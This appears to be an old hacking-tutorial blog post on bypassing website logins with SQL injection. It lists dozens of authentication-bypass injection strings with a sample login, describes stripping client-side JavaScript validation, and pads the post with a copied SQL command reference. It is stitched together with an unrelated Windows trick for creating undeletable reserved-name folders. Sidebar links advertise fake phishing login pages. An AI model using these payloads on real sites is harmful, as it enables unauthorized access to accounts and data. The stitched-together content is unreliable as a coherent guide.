Bypass login by sql injection (explained)
For those of you who dont already know SQL injection is a technique used to take advantage of non-
validated input vulnerabilities to pass SQL commands through a Web application for execution by a
backend database. Attackers take advantage of the fact that programmers often chain together SQL
commands with user provided parameters, and can therefore embed SQL commands inside these
parameters. the result is that the attacker can execute arbitrary SQL queries and commands on the
backend database server through the Web application.
A database is a table full of private and public site information such as usernames, products, etc.
They are fundamental components of Web applications. Databases enable Web applications to store
data, preferences and content elements. Using SQL web applications interact with databases to
dynamically build customized data views for each user.
Data types:
mysql.user
mysql.host
mysql.db
Bypassing login scripts:
SQL injection strings and the DB doesnt matter.
‘) OR (‘a’ = ‘a
‘) OR (’1′-’1
‘or”=’
‘ OR ’1=1
admin’–
‘ or 0=0 –
” or 0=0 –
or 0=0 –
‘ or 0=0 *
” or 0=0 *
or 0=0 *
‘ or ‘x’='x
” or “x”=”x
‘) or (‘x’='x
‘ or 1=1–
” or 1=1–
or 1=1–
‘ or a=a–
” or “a”=”a
‘) or (‘a’='a
“) or (“a”=”a
hi” or “a”=”a
hi” or 1=1 –
hi’ or 1=1 –
hi’ or ‘a’='a
hi’) or (‘a’='a
hi”) or (“a”=”a
‘ or 1=1–
or a=a–
‘ or 1=1–
1′ having ’1′=’1′–
‘ or ‘x’='x–
foo’+OR+’1′=’1
Note: having 1=1–
12/27/07
Sourav Patra
Example:
Login: hi’or 1=1–
Password: hi’or 1=1–
SQL commands:
ABORT — abort the current transaction
ALTER DATABASE — change a database
ALTER GROUP — add users to a group or remove users from a group
ALTER TABLE — change the definition of a table
ALTER TRIGGER — change the definition of a trigger
ALTER USER — change a database user account
ANALYZE — collect statistics about a database
BEGIN — start a transaction block
CHECKPOINT — force a transaction log checkpoint
CLOSE — close a cursor
CLUSTER — cluster a table according to an index
COMMENT — define or change the comment of an object
COMMIT — commit the current transaction
COPY — copy data between files and tables
CREATE AGGREGATE — define a new aggregate function
CREATE CAST — define a user-defined cast
CREATE CONSTRAINT TRIGGER — define a new constraint trigger
CREATE CONVERSION — define a user-defined conversion
CREATE DATABASE — create a new database
CREATE DOMAIN — define a new domain
CREATE FUNCTION — define a new function
CREATE GROUP — define a new user group
CREATE INDEX — define a new index
CREATE LANGUAGE — define a new procedural language
CREATE OPERATOR — define a new operator
CREATE OPERATOR CLASS — define a new operator class for indexes
CREATE RULE — define a new rewrite rule
CREATE SCHEMA — define a new schema
CREATE SEQUENCE — define a new sequence generator
CREATE TABLE — define a new table
CREATE TABLE AS — create a new table from the results of a query
CREATE TRIGGER — define a new trigger
CREATE TYPE — define a new data type
CREATE USER — define a new database user account
CREATE VIEW — define a new view
DEALLOCATE — remove a prepared query
DECLARE — define a cursor
DELETE — delete rows of a table
12/27/07
Sourav Patra
DROP AGGREGATE — remove a user-defined aggregate function
DROP CAST — remove a user-defined cast
DROP CONVERSION — remove a user-defined conversion
DROP DATABASE — remove a database
DROP DOMAIN — remove a user-defined domain
DROP FUNCTION — remove a user-defined function
DROP GROUP — remove a user group
DROP INDEX — remove an index
DROP LANGUAGE — remove a user-defined procedural language
DROP OPERATOR — remove a user-defined operator
DROP OPERATOR CLASS — remove a user-defined operator class
DROP RULE — remove a rewrite rule
DROP SCHEMA — remove a schema
DROP SEQUENCE — remove a sequence
DROP TABLE — remove a table
DROP TRIGGER — remove a trigger
DROP TYPE — remove a user-defined data type
DROP USER — remove a database user account
DROP VIEW — remove a view
END — commit the current transaction
EXECUTE — execute a prepared query
EXPLAIN — show the execution plan of a statement
FETCH — retrieve rows from a table using a cursor
GRANT — define access privileges
INSERT — create new rows in a table
LISTEN — listen for a notification
LOAD — load or reload a shared library file
LOCK — explicitly lock a table
MOVE — position a cursor on a specified row of a table
NOTIFY — generate a notification
PREPARE — create a prepared query
REINDEX — rebuild corrupted indexes
RESET — restore the value of a run-time parameter to a default value
REVOKE — remove access privileges
ROLLBACK — abort the current transacti
SELECT — retrieve rows from a table or view
SELECT INTO — create a new table from the results of a query
SET — change a run-time parameter
12/27/07
Sourav Patra
SET CONSTRAINTS — set the constraint mode of the current transaction
SET SESSION AUTHORIZATION — set the session user identifier and the current user identifier of the
current session
SET TRANSACTION — set the characteristics of the current transaction
SHOW — show the value of a run-time parameter
START TRANSACTION — start a transaction block
TRUNCATE — empty a table
UNLISTEN — stop listening for a notification
UPDATE — update rows of a tab
VACUUM — garbage-collect and optionally analyze a database
The input validation can also be bypassed bcz of the bad programming techniques.In most of the
websites input validation is done at the client end i.e at the browser end using JAVASCRIPT. what u
can do is open the page and then save the page in ur hard disk.Then open the HTML page in any HTML
editor (say Frontpage or Dreamweaver or even notepad) and delete the code of input
validation code
validation code
of JAVA script and then simply go ahead
Open command prompt.
change to the directory in which u want to make folder.
type
mkdir .\con\\
Or
Md .\con\\
You can choose folder name from the name given below
CON
LPT1
LPT2
LPT3
LPT4
LPT5
LPT6
LPT7
LPT8
LPT9
AUX
———————–
Logic behind this is : IN Windows above names are researved words and you cann’t create folder or
file with above name. Once you will create the folder nobody will be able to delete it in normal
way. I have tested it with XP 2000 and 2003. Windows 98 is currently not available to me for
testing. If you can test it on Windows 98 then please do it and let me know the result. I expect it
to work.
You May Also Like To Read:
- Bypass login by sql injection
- Bypass Registration for Sites By BUG ME NOT
- The Concept Of IP Address Explained..
- How to create a fake login for phishing yourself
- Reveal Login Asterisks..!!
- The Concept Of BandWidth Explained
- Yahoo fake login page
- Fake login for MySpace and RuneScape
- Multiple login in yahoo Without Using any Software
Comments